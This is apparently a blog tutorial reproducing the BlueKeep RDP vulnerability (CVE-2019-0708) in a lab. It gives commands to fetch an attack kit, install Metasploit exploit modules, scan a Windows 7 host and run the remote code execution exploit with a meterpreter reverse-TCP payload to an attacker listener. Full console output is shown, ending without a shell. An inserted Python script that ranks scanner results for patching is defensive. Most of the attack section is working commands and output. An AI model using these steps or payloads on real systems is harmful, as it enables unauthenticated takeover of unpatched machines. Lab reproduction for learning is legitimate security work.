
Remote Desktop Remote Code Execution Vulnerability (CVE-2019-0708)

Vulnerability description


Disclaimer: the techniques, ideas and tools covered in this article are provided solely for security-oriented learning and exchange. Nobody may use them for illegal purposes or for profit; anyone who does bears the consequences themselves!

A remote code execution vulnerability exists in Remote Desktop Services (formerly known as Terminal Services) when an unauthenticated attacker connects to the target system over RDP and sends specially crafted requests. The vulnerability is pre-authentication and requires no user interaction.

Reference: https://www.hackliu.com/?p=468


Affected versions


Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP


FOFA query

Environment setup

Attacker: Kali 2021.1

Victim: Windows 7

Vulnerability reproduction

Loading the payload

Update msf;

apt-get update
apt-get install metasploit-framework

Download the attack kit;

https://gitee.com/cat-nineteen/tools/blob/master/tools/msftools/CVE-2019-0708RDP.zip

Replace the corresponding files in msf;

cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb


Start msf;

msfconsole

# Error printed on startup:
root@kali:/opt/tools/msftools/CVE-2019-0708RDP# msfconsole
Unable to find a spec satisfying metasploit-framework (>= 0) in the set. Perhaps the lockfile is corrupted?
Run `bundle install` to install missing gems.

Use reload_all to load the payload files;

reload_all

Search for 2019_0708; the files have been loaded successfully;

search 2019_0708


Vulnerability verification

Use the scanner module;
msf5 > use  auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhost 192.168.220.130
rhost => 192.168.220.130
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > show options

Module options (auxiliary/scanner/rdp/cve_2019_0708_bluekeep):

Name Current Setting Required Description
---- --------------- -------- -----------
RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect
RDP_CLIENT_NAME rdesktop no The client computer name to report during connect, UNSET = random
RDP_DOMAIN no The client domain name to report during connect
RDP_USER no The username to report during connect, UNSET = random
RHOSTS 192.168.220.130 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3389 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)


Auxiliary action:

Name Description
---- -----------
Scan Scan for exploitable targets


msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run

[*] 192.168.220.130:3389 - Detected RDP on 192.168.220.130:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.220.130:3389 - The target is vulnerable.
[*] 192.168.220.130:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

# "The target is vulnerable" shows that the target host is affected by CVE-2019-0708

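When the scanner is run against many hosts, the two line formats shown above ("Detected RDP on ... (Windows version: ...) (Requires NLA: ...)" and "The target is vulnerable.") are what a defender needs to triage. The following added example (not part of the original post or of Metasploit) parses that output into per-host records and ranks them: a confirmed-vulnerable host that does not require NLA is reachable pre-authentication and goes first. The sample text is constructed for the example; the second host is made up and only mimics the format above.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample in the format printed by auxiliary/scanner/rdp/cve_2019_0708_bluekeep.
# The .130 lines copy the output shown above; the .131 host is made up (it requires NLA, so
# the module cannot confirm the vulnerability and prints no "[+]" verdict line for it).
SAMPLE_OUTPUT = """\
[*] 192.168.220.130:3389 - Detected RDP on 192.168.220.130:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.220.130:3389 - The target is vulnerable.
[*] 192.168.220.131:3389 - Detected RDP on 192.168.220.131:3389 (Windows version: 6.1.7601) (Requires NLA: Yes)
[*] 192.168.220.130:3389 - Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
"""

DETECT_RE = re.compile(r"^\[\*\] (?P<host>[\d.]+):(?P<port>\d+) - Detected RDP on \S+ "
                       r"\(Windows version: (?P<ver>[\d.]+)\) \(Requires NLA: (?P<nla>Yes|No)\)")
VULN_RE = re.compile(r"^\[\+\] (?P<host>[\d.]+):(?P<port>\d+) - The target is vulnerable\.")

@dataclass
class RdpHost:
    host: str
    port: int
    version: Optional[str] = None
    requires_nla: Optional[bool] = None
    vulnerable: bool = False

    def priority(self) -> str:
        # Confirmed vulnerable and no NLA: exploitable without credentials, patch first.
        if self.vulnerable and self.requires_nla is False:
            return "P1-patch-now"
        if self.vulnerable:
            return "P2-patch"
        if self.requires_nla is False:      # not confirmed, but still exposed pre-auth
            return "P3-enable-nla"
        return "P4-review"                  # NLA on or no verdict: verify patch level manually

def parse_bluekeep_scan(text: str) -> Dict[str, RdpHost]:
    """Build one RdpHost per host:port from scanner output; unrelated lines are ignored."""
    hosts: Dict[str, RdpHost] = {}
    for line in text.splitlines():
        m = DETECT_RE.match(line) or VULN_RE.match(line)
        if not m:
            continue
        key = f"{m['host']}:{m['port']}"
        h = hosts.setdefault(key, RdpHost(m['host'], int(m['port'])))
        if 'ver' in m.groupdict():          # detection line carries version and NLA state
            h.version, h.requires_nla = m['ver'], (m['nla'] == 'Yes')
        else:                               # verdict line
            h.vulnerable = True
    return hosts

def triage(text: str) -> List[str]:
    return [f"{k} version={h.version} nla={h.requires_nla} vulnerable={h.vulnerable} -> {h.priority()}"
            for k, h in sorted(parse_bluekeep_scan(text).items())]
```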

Exploitation
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhost 192.168.220.130
rhost => 192.168.220.130
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rport 3389
rport => 3389
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 4
target => 4
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

Name Current Setting Required Description
---- --------------- -------- -----------
RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect
RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random
RDP_DOMAIN no The client domain name to report during connect
RDP_USER no The username to report during connect, UNSET = random
RHOSTS 192.168.220.130 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 3389 yes The target port (TCP)


Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.220.139 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)


msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets

Exploit targets:

Id Name
-- ----
0 Automatic targeting via fingerprinting
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
5 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
6 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
7 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)
8 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)


msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 192.168.220.139:4444
[*] 192.168.220.130:3389 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.220.130:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 192.168.220.130:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.220.130:3389 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.220.130:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.220.130:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[!] 192.168.220.130:3389 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.220.130:3389 - Surfing channels ...
[*] 192.168.220.130:3389 - Lobbing eggs ...
[*] 192.168.220.130:3389 - Forcing the USE of FREE'd object ...

Still no shell was obtained.
